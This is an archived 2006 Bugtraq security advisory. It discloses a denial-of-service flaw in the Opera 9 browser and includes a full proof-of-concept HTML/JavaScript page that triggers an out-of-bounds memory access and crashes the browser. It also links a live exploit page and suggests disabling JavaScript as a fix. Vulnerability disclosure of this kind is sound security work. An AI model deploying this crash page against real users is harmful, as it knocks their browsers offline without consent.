Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

OPERA Web Browser 9 Denial OF Service

From: y3dips () echo or id
Date: 1 Jul 2006 09:17:37 -0000
ECHO_ADV_35$2006

------------------------------------------------------------------------------------
[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service
------------------------------------------------------------------------------------

Author          : Ahmad Muammar W.K (a.k.a) y3dips
Date Found      : July, 1th 2006
Location        : Indonesia, Jakarta
web             : http://echo.or.id/adv/adv35-y3dips-2006.txt
Critical Lvl    : Moderated
Impact          : Browser will automatically shutdown
Where           : From Remote
------------------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Opera Web Browser

Application     : Opera Web Browser
version         : Opera/9.00 (X11; Linux i686; U; en)
                  Opera/9.00 (Windows NT 5:1;U;en)
                  Some Other version are bot vulnerable and others are not tested,
                        
URL             : http://opera.com
Description     :

Vulnerability can be exploited by using <iframe> combining with javascript
(documents stylesheet) to create an out-of-bounds memory access.

------------------------------------------------------------------------------------

Exploit Code:
~~~~~~~~~~~~~~~~

-----------------------opera9xploit.html----------------------

<!-- Opera 9 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3d1ps.blogspot.com
//-->

<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
        {
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
                {
        if (f[j].name == 'fsmain');
        }  
      }

 }
mystyle();
</script>
</html>

live exploit :

http://y3dips.echo.or.id/opera9-dos/

------------------------------------------------------------------------------------

Solution:
~~~~~~~~

Disable Java Scipt execution from Opera Web browser


------------------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ my beloved ana

~ the_day, K-159 (keep researching), also all echo staff
~ negative , naisenodni crew
~ janex vind "waraxe" @ waraxe.us 
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

------------------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] -------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: